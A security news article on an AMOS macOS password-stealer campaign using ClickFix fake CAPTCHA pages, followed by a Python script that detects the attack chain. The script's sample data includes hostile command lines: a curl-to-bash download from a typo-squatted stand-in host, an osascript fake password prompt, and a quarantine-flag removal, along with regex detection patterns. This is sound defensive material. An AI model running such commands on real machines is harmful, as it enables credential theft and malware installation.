New Apple Passwords Attack Confirmed — What You Need To Know

New macOS password attack hits Apple users.
Although it is far more commonplace to read about password attacks against users of the Windows operating system, or targeting services such as Gmail, the truth of the matter is that nobody is safe from the credential-theft threat as this newly confirmed Apple password-stealing attack illustrates. Here’s what you need to know about the AMOS campaign targeting macOS users.
What You Need To Know About The AMOS Apple Passwords Attack
The latest adversary intelligence report from Koushik Pal, a threat researcher at CloudSEK, has warned users that a newly identified Atomic macOS stealer campaign utilizing a previously unknown variant has been observed targeting the Apple operating system.
Although this latest and ongoing threat leverages well-known existing tactics and techniques, such as the Clickfix fake CAPTCHA screen and multi-platform social engineering, the danger it poses to macOS users remains high nonetheless.
Better known as AMOS, this latest variant of the Atomic macOS Stealer has been observed using Clickfix attack sites that impersonate a U.S. support services company within the cable TV, internet provision, mobile phone, and managed services sectors. The brand impersonation in this case is made possible by way of typo-squatting domains that appear similar to the genuine article.
“The macOS users are served a malicious shell script designed to steal system passwords and download an AMOS variant for further exploitation,” Pal warned. This script then uses native macOS commands to “harvest credentials, bypass security mechanisms, and execute malicious binaries.” This is, to be fair, as significant a threat to your Apple passwords as you are going to get.
Targeting both consumer and corporate users, and highlighting a trend in such multi-platform social engineering attacks, Pal said that source code comments suggested that Russian-speaking cybercriminals are behind the new AMOS threat campaign.
The AMOS malware utilises legitimate utilities to circumvent endpoint security controls and extract macOS user passwords, which can then be used for lateral movement or sold to initial access brokers for use in other cybercriminal campaigns, including ransomware attacks.
Users should be educated about the tactics used by such Apple passwords-stealing campaigns, Pal recommended by way of mitigation, “especially those disguised as system verification prompts.”
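As an added defensive example (not code from the article or the CloudSEK report), the Python script below flags the ClickFix chain described above in constructed shell command telemetry: a remote script piped straight into a shell, followed by the same user triggering a hidden-answer password dialog or stripping the quarantine flag from a downloaded binary. The sample events and the specific command indicators are assumptions drawn from commonly reported ClickFix tradecraft, not details from the report.

```python
import re

# Constructed sample shell command events (time-ordered); not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 101, "user": "jane", "cmd": "ls -la ~/Documents"},
    {"pid": 102, "user": "jane", "cmd": "curl -fsSL https://typosquat-support.example/verify.sh | bash"},
    {"pid": 103, "user": "jane", "cmd": "osascript -e 'display dialog \"Enter your password\" default answer \"\" with hidden answer'"},
    {"pid": 104, "user": "jane", "cmd": "xattr -d com.apple.quarantine /tmp/update"},
    {"pid": 105, "user": "bob", "cmd": "curl -fsSL https://brew.example/install.sh | bash"},
    {"pid": 106, "user": "bob", "cmd": "git status"},
]

# Indicator patterns: assumed from commonly reported ClickFix/stealer tradecraft,
# not taken from the CloudSEK report.
LURE = re.compile(r"\bcurl\b.*\|\s*(ba|z)?sh\b|\bbase64\s+(-d|--decode)\b.*\|\s*(ba|z)?sh\b")
FOLLOW_ON = {
    "hidden_password_dialog": re.compile(r"\bosascript\b.*with hidden answer"),
    "quarantine_flag_removed": re.compile(r"\bxattr\b.*\s-d\s.*com\.apple\.quarantine"),
}


def classify(cmd):
    """Return the follow-on indicator names matched by a single command line."""
    return [name for name, pat in FOLLOW_ON.items() if pat.search(cmd)]


def detect_chains(events, window=5):
    """Alert when a piped remote script is followed, within `window` later commands
    by the same user, by a credential prompt or a quarantine bypass.
    A lone curl|bash (e.g. a developer install script) does not alert on its own."""
    alerts = []
    by_user = {}
    for ev in events:
        by_user.setdefault(ev["user"], []).append(ev)
    for user, evs in by_user.items():
        for i, ev in enumerate(evs):
            if not LURE.search(ev["cmd"]):
                continue
            tags = []
            for nxt in evs[i + 1 : i + 1 + window]:
                tags.extend(classify(nxt["cmd"]))
            if tags:
                alerts.append({"user": user, "trigger_pid": ev["pid"], "indicators": sorted(set(tags))})
    return alerts


if __name__ == "__main__":
    for alert in detect_chains(SAMPLE_EVENTS):
        print(alert)
```

On the constructed sample only jane's session alerts; bob's install-style `curl | bash` with no follow-on indicator is left alone, which is the trade-off to tune against real telemetry.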